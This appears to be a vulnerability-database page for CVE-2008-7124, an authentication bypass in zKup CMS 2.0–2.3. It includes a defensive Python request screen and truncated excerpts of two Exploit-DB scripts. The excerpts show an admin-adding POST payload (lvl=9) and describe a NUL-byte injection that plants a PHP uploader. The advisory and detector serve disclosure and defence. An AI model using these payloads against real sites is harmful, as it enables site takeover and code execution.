CVE-2008-7124
Published 2009-08-31
Priority P359 · high · 7.5 · CVSS 2.0
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 8.61% (94.4th percentile)
zKup CMS 2.0 through 2.3 does not require administrative authentication for admin/configuration/modifier.php, which allows remote attackers to gain administrator privileges via a direct request, as demonstrated by adding a new administrator.
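A request screen for the flaw described above, as an added example that is not part of the advisory, of zKup, or of the exploit authors' code. The script path and the `action`, `login` and `lvl` parameter names are taken from the exploit excerpts quoted on this page; the `authenticated` flag supplied by the caller and the sample requests are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Path from the advisory; \Z (not $) so a trailing newline cannot satisfy the anchor.
ADMIN_SCRIPT = re.compile(r"/admin/configuration/modifier\.php\Z", re.IGNORECASE)
ALNUM = re.compile(r"[A-Za-z0-9]+")  # applied with fullmatch() to the whole decoded value


def screen_request(method, url, body, authenticated):
    """Return the reasons to reject one request; an empty list means let it through.

    `authenticated` is an assumption of this sketch: the caller (for example a
    reverse proxy that checks the admin session) decides it and passes it in.
    """
    reasons = []
    if not ADMIN_SCRIPT.search(urlsplit(url).path):
        return reasons
    if not authenticated:
        reasons.append("admin script requested without an admin session")
    if method.upper() != "POST":
        return reasons
    # parse_qs percent-decodes, so an encoded %00 arrives here as a real NUL character.
    form = parse_qs(body, keep_blank_values=True)
    if not authenticated and form.get("action") == ["ajout"]:
        level = form.get("lvl", ["?"])[0]
        reasons.append(f"unauthenticated account creation (lvl={level})")
    for login in form.get("login", []):
        if "\x00" in login:
            reasons.append("NUL byte in login")
        elif not ALNUM.fullmatch(login):
            reasons.append("login is not strictly alphanumeric")
    return reasons


# Constructed sample requests (not captured traffic): method, URL, body, authenticated.
SAMPLES = [
    ("GET", "/index.php?page=news", "", False),
    ("POST", "/admin/configuration/modifier.php",
     "action=ajout&login=editor2&mdp=x&mdp2=x&lvl=1", True),
    ("POST", "/votresite/admin/configuration/modifier.php",
     "action=ajout&login=real&mdp=x&mdp2=x&lvl=9", False),
    ("POST", "/admin/configuration/modifier.php",
     "action=ajout&login=abc%00trailing&mdp=x&mdp2=x&lvl=1", True),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[0], sample[1], "->", screen_request(*sample) or "ok")
```

The login check runs on the decoded value and must match the whole string, so a value that is alphanumeric only up to an embedded NUL is rejected even when the session is valid.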
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zkup | zkup | — | — |
| zkup | zkup | — | — |
| zkup | zkup | — | — |
| zkup | zkup | — | — |
No detection rules found.
Exploit-DB
zKup CMS 2.0 < 2.3 - Remote Add Admin
exploitdb·2008-03-07
```php
zKup CMS 2.0
* Date: 03-08-2008
* Conditions: None.
*
* This exploit adds a new zKup admin.
*
*/
print "\n";
print " zKup CMS v2.0 \n\n";
if($argc \n eg: php zkup2_admin_exploit.php http://127.0.0.1/votresite/ real p4ssw0rd";exit(-1); }
$url = $argv[1];
$log = $argv[2];
$pas = $argv[3];
$postit = "action=ajout&login=$log&mdp=$pas&mdp2=$pas&lvl=9";
print "[*] sending evil c0de ... ";
if(preg_match("#alert#i",post($url."admin/configuration/modifier.php","$postit"))) print "done.\n";
else print "failed.\n";
function post($url,$data,$get=1)
{
$result = '';
preg_match("#^http://([^/]+)(/.*)$#i",$url,$info);
$host = $info[1];
$page = $info[2];
$fp = fsockopen($host, 80, &$errno, &$errstr, 30);
$req = "POST $page HTTP/1.1\r\n";
$req .= "Host: $host\r\n";
$req .= "User-Agent: Mozilla Firefox\
```
Exploit-DB
zKup CMS 2.0 < 2.3 - Arbitrary File Upload
exploitdb·2008-03-07
```php
zKup CMS 2.0
* Date: 03-08-2008
* Conditions: PHP Version, magic_quotes_gpc=Off
*
* This exploit spawns a php uploader in your victim's
* server.
*
* Okay, you may need explanations:
*
* First, we can use administration without being admin
* (see ./admin/configuration/modifier.php)
*
* Then, when we add an admin, it is saved in a php file,
* named "./fichiers/config.php".
* A vuln is present when the script controls $login value,
* because it uses this regex: #^[a-zA-Z0-9]+$#
* in order to see if it's alphanumerical.
* I bypassed this regex using a NULL POISON BYTE (%00),
* and writing my upload script just after.
* I finally put some lines in order not to
* corrupt config.php.
*
*/
print "\n";
print " zKup CMS v2.0 \n\n";
if($argc\n eg: php zkup2_upload_exploit.php http://127.0.0.1/votres
```
No writeups or analysis indexed.
http://osvdb.org/43081
http://secunia.com/advisories/29276
http://www.securityfocus.com/bid/28149
http://www.zkup.fr/actualite-zkup/maj-critique-v203v204.html
https://exchange.xforce.ibmcloud.com/vulnerabilities/41068
https://www.exploit-db.com/exploits/5219
https://www.exploit-db.com/exploits/5220
Published 2009-08-31